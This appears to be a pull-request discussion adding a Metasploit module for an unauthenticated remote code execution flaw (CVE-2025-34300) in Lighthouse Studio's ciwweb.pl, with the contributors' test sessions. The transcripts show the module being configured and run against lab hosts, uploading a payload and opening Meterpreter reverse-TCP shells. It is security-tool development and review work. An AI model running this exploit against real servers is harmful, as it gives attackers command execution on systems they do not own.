Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300)

[vognik]

Vulnerability Details

This module exploits a template injection vulnerability in the
Sawtooth Software Lighthouse Studio's ciwweb.pl web application.
The application fails to properly sanitize user input within survey templates,
allowing unauthenticated attackers to inject and execute arbitrary Perl commands
on the target system.

This vulnerability affects Lighthouse Studio versions prior to 9.16.14.
Successful exploitation may result in remote code execution under the privileges
of the web server, potentially exposing sensitive data or disrupting survey operations.

An attacker can execute arbitrary system commands as the web server.

Module Information

Module path: exploit/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300
Platform: Linux/Unix/Windows
Tested on: Ubuntu 18.0.4 / Windows 10
Requirements: Nothing

References

Original Research
https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/

Test Output

msf6 > use exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > show options

Module options (exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300):

   Name       Current Setting     Required  Description
   ----       ---------------     --------  -----------
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                  yes       The target port (TCP)
   SSL        false               no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   STUDYNAME                      no        Value for the hid_studyname GET parameter
   TARGETURI  /cgi-bin/ciwweb.pl  yes       Path to vulnerable ciwweb.pl
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set RHOSTS 192.168.19.129
RHOSTS => 192.168.19.129
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set STUDYNAME 123
STUDYNAME => 123
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set LHOST eth0
LHOST => 192.168.19.130
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set SRVPORT 9999
SRVPORT => 9999
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Extracting version...
[*] Extracted version: 9.16.12
[+] The target appears to be vulnerable.
[*] Uploading malicious payload...
[*] Command Stager progress -  44.31% done (362/817 bytes)
[*] Uploading malicious payload...
[*] Sending stage (3045380 bytes) to 192.168.19.129
[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.129:39790) at 2025-07-20 07:04:31 -0400
[*] Command Stager progress -  97.31% done (795/817 bytes)
[*] Uploading malicious payload...
[*] Command Stager progress - 100.00% done (817/817 bytes)

meterpreter > sysinfo
Computer     : 192.168.19.129
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[jheysel-r7]

Thanks for the module @vognik. A couple comments.

Testing

msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set studyname test
studyname => test
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set writabledir /tmp
writabledir => /tmp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Extracting version...
[*] Extracted version: 9.16.12
[+] The target appears to be vulnerable.
[*] Uploading malicious payload...
[*] Sending stage (3045380 bytes) to 172.16.199.132
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.132:36724) at 2025-07-23 10:39:29 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[vognik]

@bwatters-r7, @jheysel-r7 Thanks for the code review and valuable advice!

The cmd/windows/http/x64/meterpreter/reverse_tcp payload worked only when I added cmd.exe /c, but the problem still persists that for some unknown reason it does not resolve environment variables (like %TEMP%, which is the default).

That's why I had files with %TEMP% in the file name saved in cgi-bin (and in general, the payload ran every other time).

---

So I still left the override of the default temporary directory (with absolute path), this works quite well